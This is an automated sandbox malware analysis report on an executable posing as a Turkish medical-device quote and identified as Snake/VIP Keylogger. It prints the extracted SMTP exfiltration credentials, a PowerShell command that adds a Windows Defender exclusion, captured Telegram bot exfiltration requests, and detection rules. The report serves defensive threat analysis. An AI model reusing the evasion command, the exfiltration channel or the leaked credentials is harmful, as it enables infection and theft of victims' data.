Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe

Overview

General Information

Sample name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
renamed because original name is a hash value
Original sample name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Siparii jpeg docx _ .exe
Analysis ID:1569776
MD5:bd1688f2a780e8ea5437f539f5ffc596
SHA1:abf80f4d8ee0d4bc422b0b6d1f94b9ad72db1b7c
SHA256:3acb8bf44a7ddcf515e9dc3dc823d9bef720e41a02c9adfd1879ce786bb8e049
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d0d5:$a1: get_encryptedPassword
        • 0x2d3ea:$a2: get_encryptedUsername
        • 0x2cee5:$a3: get_timePasswordChanged
        • 0x2cfee:$a4: get_passwordField
        • 0x2d0eb:$a5: set_encryptedPassword
        • 0x2e7b5:$a7: get_logins
        • 0x2e718:$a10: KeyLoggerEventArgs
        • 0x2e37d:$a11: KeyLoggerEventArgsEventHandler
        00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d2d5:$a1: get_encryptedPassword
                  • 0x2d5ea:$a2: get_encryptedUsername
                  • 0x2d0e5:$a3: get_timePasswordChanged
                  • 0x2d1ee:$a4: get_passwordField
                  • 0x2d2eb:$a5: set_encryptedPassword
                  • 0x2e9b5:$a7: get_logins
                  • 0x2e918:$a10: KeyLoggerEventArgs
                  • 0x2e57d:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 14 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, ParentProcessId: 7360, ParentProcessName: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", ProcessId: 7548, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, ParentProcessId: 7360, ParentProcessName: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", ProcessId: 7548, ProcessName: powershell.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.245.159.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, Initiated: true, ProcessId: 7608, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49802
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, ParentProcessId: 7360, ParentProcessName: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe", ProcessId: 7548, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-06T09:58:01.078229+010028033053Unknown Traffic192.168.2.749707172.67.177.134443TCP
                  2024-12-06T09:58:07.197372+010028033053Unknown Traffic192.168.2.749727172.67.177.134443TCP
                  2024-12-06T09:58:13.318951+010028033053Unknown Traffic192.168.2.749747172.67.177.134443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-06T09:57:57.177110+010028032742Potentially Bad Traffic192.168.2.749702193.122.6.16880TCP
                  2024-12-06T09:57:59.458397+010028032742Potentially Bad Traffic192.168.2.749702193.122.6.16880TCP
                  2024-12-06T09:58:02.520889+010028032742Potentially Bad Traffic192.168.2.749714193.122.6.16880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeAvira: detected
                  Found malware configuration
                  Source: 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeReversingLabs: Detection: 34%
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeVirustotal: Detection: 34%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49704 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49781 version: TLS 1.2
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 076D92A6h0_2_076D8816
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 029AF475h7_2_029AF2D8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 029AF475h7_2_029AF4C4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 029AF475h7_2_029AF53D
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 029AFC31h7_2_029AF988
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556E501h7_2_0556E258
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556D7F9h7_2_0556D550
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 05562C19h7_2_05562968
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 055631E0h7_2_0556310E
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 055631E0h7_2_05562DC2
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 055631E0h7_2_05562DC8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556DC51h7_2_0556D9A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_05560040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556FAB9h7_2_0556F810
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556D3A1h7_2_0556D0F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556CF49h7_2_0556CCA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556F209h7_2_0556EF60
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556EDB1h7_2_0556EB08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 05560D0Dh7_2_05560B30
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 05561697h7_2_05560B30
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556F661h7_2_0556F3B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556E0A9h7_2_0556DE00
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 4x nop then jmp 0556E959h7_2_0556E6B0

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.7:49802 -> 77.245.159.14:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2007/12/2024%20/%2009:28:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49714 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49747 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49727 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.7:49802 -> 77.245.159.14:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49704 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2007/12/2024%20/%2009:28:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.adendanismanlik.com.tr
